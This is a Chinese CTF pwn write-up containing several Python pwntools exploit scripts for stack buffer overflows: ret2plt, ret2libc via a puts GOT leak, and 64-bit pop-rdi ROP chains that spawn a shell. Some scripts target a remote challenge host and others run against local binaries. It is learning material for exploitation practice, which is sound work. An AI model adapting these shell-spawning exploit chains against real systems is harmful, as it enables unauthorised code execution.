nc 直连cat flag
使用ROPgadgets查找system和/bin/sh的地址,拼接payload
exp
# Writeup exploit script (Python 2 pwntools: ``.next()`` and str payloads
# are Python 2 idioms).  Stage-less ret2plt: every address is read from
# the binary itself, so this only works for a non-PIE build.
from pwn import *
#sh = process('./stack')
elf = ELF('./stack')
# Remote CTF instance from the writeup (author's host/port).
sh = remote('111.231.70.44',28030)
# PLT stub for system() and the '/bin/sh' string inside the binary.
sys_addr = elf.plt['system']
bin_addr = elf.search('/bin/sh').next()
# 13 bytes of padding reach the saved return address (offset from the
# author's analysis, not shown on this page).  The rest mirrors a 32-bit
# cdecl call frame: callee, fake return address (0), first argument.
# A stack canary or PIE would stop this script, since it leaks nothing.
payload = 'a' * 13
payload += p32(sys_addr)
payload += p32(0)
payload += p32(bin_addr)
# Wait for the program's first line of output before sending.
sh.recvuntil("\n")
sh.sendline(payload)
sh.interactive()
这个题目是今天刚做出来的,昨天刚学的libc,刚好刷到这道题目。可以看到这个题目中没有system和/bin/sh了,但是看到了puts,直接用puts泄露libc地址,利用libc里的system和/bin/sh字符串来getshell.
exp
# Writeup exploit script (Python 2 pwntools).  Two stages: first leak the
# address of puts from the GOT to defeat libc ASLR, then return into libc.
from pwn import *
#sh = process('./stack1')
# Remote CTF instance from the writeup (author's host/port).
sh = remote('111.231.70.44',28007)
context.log_level = 'debug'
elf = ELF('./stack1')
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
# Hard-coded path to the author's copy of the target libc.  The offsets
# below are only valid when the remote runs exactly this libc build.
libc = ELF('/home/ly0n/pwn/tools/libc6-i386_2.27-3ubuntu1_amd64.so')
puts_plt_addr =elf.plt['puts']
puts_got_addr =elf.got['puts']
# Return to _start instead of main so the program re-runs from scratch
# and the overflow can be reached a second time.
main_addr =elf.sym['_start']
# Stage 1: puts(puts@got) prints the resolved libc address of puts.
# 13 bytes of padding reach the saved return address (author's offset).
payload = "a"*13
payload += p32(puts_plt_addr)
payload += p32(main_addr)
payload += p32(puts_got_addr)
sh.recvuntil('!\n')
sh.sendline(payload)
# The leak is the 4 raw bytes following the program's own output.
sh.recvuntil("\n\n")
puts_addr = u32(sh.recv(4))
print "puts:"
print hex(puts_addr)
# libc base = leaked runtime address - static offset of puts in the file.
libc_puts_addr = int(libc.sym['puts'])
base_addr = puts_addr-libc_puts_addr
system_addr = base_addr+int(libc.sym['system'])
binsh_addr = base_addr+int(libc.search('/bin/sh').next())
# Stage 2: same frame shape, now with libc's system and '/bin/sh'.
max_payload = 'a' * 13
print "base:"
print hex(base_addr)
print "system:"
print hex(system_addr)
print "binsh:"
print hex(binsh_addr)
max_payload += p32(system_addr)
max_payload += p32(main_addr)
max_payload += p32(binsh_addr)
# The sleeps paper over timing with the restarted process; they are not
# a synchronisation guarantee.
sleep(1)
sh.recvuntil("\n")
sleep(1)
sh.sendline(max_payload)
sh.interactive()
emmmmmm我还没做,看了感觉应该是格式化字符串的漏洞,我还没学到,学到再做吧哈哈?
32位程序中有system和字符串/bin/sh,拼接payload即可,这里要注意的是需要一个返回地址
# Writeup exploit script (Python 2 pwntools).  Same ret2plt shape as the
# first task; only the padding length and the target differ.
from pwn import *
#sh = process('./pwn5')
#context.log_level = 'debug'
elf = ELF('./pwn5')
# Remote CTF instance from the writeup (author's host/port).
sh = remote('111.231.70.44',28054)
# Addresses taken from the binary itself (non-PIE assumption).
sys_addr = elf.plt['system']
bin_addr = elf.search('/bin/sh').next()
# 24 bytes of padding reach the saved return address (author's offset);
# then callee, fake return address (0), first argument (32-bit cdecl).
payload = 'a' * 24
payload += p32(sys_addr)
payload += p32(0)
payload += p32(bin_addr)
# No recvuntil here: the script sends immediately without waiting for a
# prompt, which is fine only if the program reads before printing.
sh.sendline(payload)
sh.interactive()
和pwn5题型一样,不过是64位程序,参数通过pop rdi传递
exp
# Writeup exploit script (Python 2 pwntools), local process only.
# 64-bit variant: the first argument travels in rdi, so a pop rdi; ret
# gadget is needed instead of the 32-bit stack-argument frame.
from pwn import *
sh = process('./pwn')
context.log_level = 'debug'
elf = ELF('./pwn')
# Gadget address found by the author for this specific binary
# (hard-coded, so it is only valid for that exact build).
rdi_addr = 0x0000000000400643
sys_addr = elf.plt['system']
bin_addr = elf.search('/bin/sh').next()
# 20 bytes of padding reach the saved return address (author's offset).
# Chain: pop rdi <- '/bin/sh', then system@plt.
payload = 'a' * 20
payload += p64(rdi_addr)
payload += p64(bin_addr)
payload += p64(sys_addr)
sh.sendline(payload)
sh.interactive()
这次没有shell了,拖进IDA里看到了有puts,想着可以通过puts泄露libc地址,一把梭吧
今天我竟然做出来了两道libc的题,晚饭可以加个鸡蛋了,哈哈哈???
exp:
# Writeup exploit script (Python 2 pwntools).  64-bit two-stage version:
# leak puts via the GOT to find the libc base, then ret2libc.
from pwn import *
#sh = process('./pwn')
# Remote CTF instance from the writeup (author's host/port).
sh = remote('111.231.70.44',28052)
context.log_level = 'debug'
elf = ELF('./pwn')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Hard-coded path to the author's copy of the target libc; offsets are
# only valid if the remote runs exactly this build.
libc = ELF('/home/ly0n/pwn/tools/libc6_2.27-3ubuntu1_amd64.so')
# Gadgets found by the author for this specific binary (hard-coded).
pop_rdi = 0x00000000004006e3
ret_add = 0x00000000004004c6
puts_plt_addr =elf.plt['puts']
puts_got_addr =elf.got['puts']
# Return to _start so the program restarts and the overflow is reachable
# again for stage 2.
main_addr =elf.sym['_start']
# Stage 1: puts(puts@got).  20 bytes of padding (author's offset), then
# pop rdi <- puts@got, call puts@plt, return to _start.
payload = "a" *20
payload += p64(pop_rdi)
payload += p64(puts_got_addr)
payload += p64(puts_plt_addr)
payload += p64(main_addr)
sh.sendline(payload)
# A 64-bit libc pointer is 6 significant bytes ending in 0x7f; read up to
# that byte, keep the last 6, zero-pad to 8 for u64.
puts_addr = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print "puts:"
print hex(puts_addr)
# libc base = leaked runtime address - static offset of puts in the file.
libc_puts_addr = libc.sym['puts']
base_addr = puts_addr-libc_puts_addr
system_addr = base_addr+libc.sym['system']
binsh_addr = base_addr+libc.search('/bin/sh').next()
payload = 'a' * 20
print "base:"
print hex(base_addr)
print hex(system_addr)
print "system:"
print hex(system_addr)
print "binsh:"
print hex(binsh_addr)
# Stage 2: an extra ret gadget first -- presumably to fix 16-byte stack
# alignment before calling system (the page does not say; confirm) --
# then pop rdi <- '/bin/sh', system, and _start as the return.
payload += p64(ret_add)
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += p64(main_addr)
sh.sendline(payload)
sh.interactive()
简单
exp:
# Writeup exploit script (Python 2 pwntools), local process only.
# Same 64-bit ret2plt chain as the earlier task with a different
# padding length and gadget address.
from pwn import *
sh = process('./pwn')
context.log_level = 'debug'
elf = ELF('./pwn')
# pop rdi; ret gadget found by the author for this specific binary.
rdi_addr = 0x0000000000400733
sys_addr = elf.plt['system']
bin_addr = elf.search('/bin/sh').next()
# 136 bytes of padding reach the saved return address (author's offset).
# Chain: pop rdi <- '/bin/sh', then system@plt.
payload = 'a' * 136
payload += p64(rdi_addr)
payload += p64(bin_addr)
payload += p64(sys_addr)
sh.sendline(payload)
sh.interactive()